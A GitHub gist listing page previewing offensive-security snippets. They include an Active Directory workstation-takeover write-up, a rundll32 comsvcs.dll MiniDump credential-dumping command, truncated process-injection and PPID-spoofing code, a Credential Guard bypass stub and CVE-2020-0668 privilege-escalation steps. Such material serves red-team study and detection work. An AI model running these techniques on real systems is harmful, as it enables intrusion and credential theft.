Skip to content

Instantly share code, notes, and snippets.

View snovvcrash's full-sized avatar
💭
Thinking in graphs

snovvcrash snovvcrash

💭
Thinking in graphs
1k followers · 110 following
View GitHub Profile
@Flangvik
Flangvik / PKI_Abuse_cheatsheet.md
Last active August 26, 2023 13:22
PKI Abuse CheatSheet
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active April 25, 2024 13:23
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@JohnLaTwC
JohnLaTwC / examples.txt
Last active December 23, 2023 19:04
comsvcs MiniDump examples
By @JohnLaTwC
References:
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense)
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24)
Detection Examples:
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full
@hasherezade
hasherezade / injection_demos.md
Last active May 18, 2024 20:57
List of my PE injection demos
@daniruiz
daniruiz / kali-shell-aliases-and-functions.sh
Last active May 6, 2024 17:57
rshell add PATH
##################################################
# Packages
# $ sudo apt install -y xclip grc gobuster rlwrap evil-winrm powercat seclists peass
# Install flatpak
# -> https://www.kali.org/docs/tools/flatpak/
# urlencode:
# $ sudo apt install gridsite-clients
# Python2 pip
# $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py | python2"
# Cool Hollywood screensaver ❤️
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created November 20, 2020 15:10 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@jfmaes
jfmaes / DInjectQueuerAPC.cs
Created November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@N4kedTurtle
N4kedTurtle / CredGuard_PoC
Created August 25, 2020 14:17
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
@lwtz
lwtz / CVE-2020-0668 - Windows LPE
Created February 19, 2020 00:59
PowerShell.exe
ProcMon.exe
- Path Includes C:\Exploit
- Process Name: svchost.exe
Add-VpnConnection -Name "hacknroll" -ServerAddress "0.0.0.0" -PassThru
REG QUERY HKLM\SOFTWARE\Microsoft\Tracing
@rasta-mouse
rasta-mouse / PPID Spoof & BlockDLLs
Last active February 29, 2024 04:21
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{